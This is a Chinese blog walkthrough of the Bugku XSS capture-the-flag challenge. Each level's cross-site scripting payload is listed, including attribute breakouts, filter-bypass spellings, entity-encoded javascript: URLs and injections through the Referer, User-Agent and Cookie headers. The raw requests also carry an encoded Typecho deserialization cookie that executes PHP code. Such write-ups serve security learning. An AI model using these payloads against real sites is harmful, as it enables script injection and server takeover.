Sky's blog

XSS挑战之旅-bugku

字数统计: 490阅读时长: 3 min
2017/09/08 Share

前记

题目网址:http://120.24.86.145:8002/test/
做题浏览器:火狐

level-1

payload:

1
<script>alert(1)</script>

level-2

payload:

1
"><script>alert(1)</script>

level-3

payload:

1
' onmouseover='alert(1)

level-4

payload:

1
" onmouseover="alert(1)

level-5

payload:

1
"><a href="javascript:alert(1)">aa</a>//

level-6

payload:

1
"><a Href="javascript:alert(1)">aa</a>//

level-7

payload:

1
"><a Hrhrefef="javascscriptript:alert(1)">aa</a>//

level-8

payload:

1
2
&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;
&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0031;&#x0029;

level-9

payload:

1
&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;alert('http://')

level-10

payload:

1
2
http://120.24.86.145:8002/test/level10.php?keyword=well done!&t_sort=8888" 
type="text" onmouseover="alert(666)

level-11

攻击点在Referer,同样的payload
payload

1
2
3
4
5
6
7
8
9
10
GET /test/level11.php?keyword=11111 HTTP/1.1
Host: 120.24.86.145:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 8888" type="text" onmouseover="alert(666)
Accept-Language: zh-CN,zh;q=0.8
Cookie: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyNToiZXZhbCgncGhwaW5mbygpO2V4aXQoKTsnKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NToiYzF0YXMiO30=
Connection: close

level-12

攻击点在UA,同样的payload
payload:

1
2
3
4
5
6
7
8
9
10
GET /test/level12.php?keyword=good%20job! HTTP/1.1
Host: 120.24.86.145:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: 8888" type="text" onmouseover="alert(666)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://120.24.86.145:8002/test/level11.php?keyword=11111
Accept-Language: zh-CN,zh;q=0.8
Cookie: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyNToiZXZhbCgncGhwaW5mbygpO2V4aXQoKTsnKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NToiYzF0YXMiO30=
Connection: close

level-13

攻击点在cookie,同样的payload
payload:

1
2
3
4
5
6
7
8
9
10
GET /test/level13.php?keyword=good%20job! HTTP/1.1
Host: 120.24.86.145:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://120.24.86.145:8002/test/level12.php?keyword=good%20job!
Accept-Language: zh-CN,zh;q=0.8
Cookie: user=8888" type="text" onmouseover="alert(666); __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyNToiZXZhbCgncGhwaW5mbygpO2V4aXQoKTsnKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NToiYzF0YXMiO30=
Connection: close

level-14

level-15

level-16

level-17

level-18

level-19

level-20

点击赞赏二维码,您的支持将鼓励我继续创作!
CATALOG
  1. 1. 前记
  2. 2. level-1
  3. 3. level-2
  4. 4. level-3
  5. 5. level-4
  6. 6. level-5
  7. 7. level-6
  8. 8. level-7
  9. 9. level-8
  10. 10. level-9
  11. 11. level-10
  12. 12. level-11
  13. 13. level-12
  14. 14. level-13
  15. 15. level-14
  16. 16. level-15
  17. 17. level-16
  18. 18. level-17
  19. 19. level-18
  20. 20. level-19
  21. 21. level-20